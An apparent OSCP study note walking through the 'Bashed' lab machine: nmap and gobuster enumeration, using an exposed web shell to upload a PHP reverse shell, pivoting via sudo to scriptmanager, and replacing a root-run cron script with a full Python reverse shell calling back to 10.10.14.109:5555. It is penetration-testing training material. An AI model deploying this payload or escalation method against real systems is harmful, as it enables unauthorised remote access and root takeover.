O
O
OSCP Notes
Search…
Bashed
Nmap result:
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
5488/tcp filtered unknown
10459/tcp filtered unknown
11833/tcp filtered unknown
15168/tcp filtered unknown
27876/tcp filtered astrolink
37122/tcp filtered unknown
45155/tcp filtered unknown
53415/tcp filtered unknown
This made me believe that the port 80 is the only attack vector, maybe somewhere to upload malicious file?
Ran gobuster
gobuster dir -u http://10.129.165.204:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/images
/php
/uploads/
/dev/
clicking one of them took me to a web based shell.
PHP version -> PHP 7.0.22-0ubuntu0.16.04.1 (cli) ( NTS )
Upload a reverse shell (pentest monkey script) and go to the directory uploads/php-reverse-shell.php to activate it.

Try to run LinEnum on it (uploaded via python HTTP server & wget - no curl downloaded )

the shell was not accessible (tty not present) so I just used the python command to call it.
Once you get the shell, you can go into the script manager's bash
sudo -u scriptmanager bash
there's text.py script that's running every min (run "date" & "ls -la" to confirm it)
replace it with the following script
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.109",5555))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
How does it call root?
  • because the text file was the root!
Copy link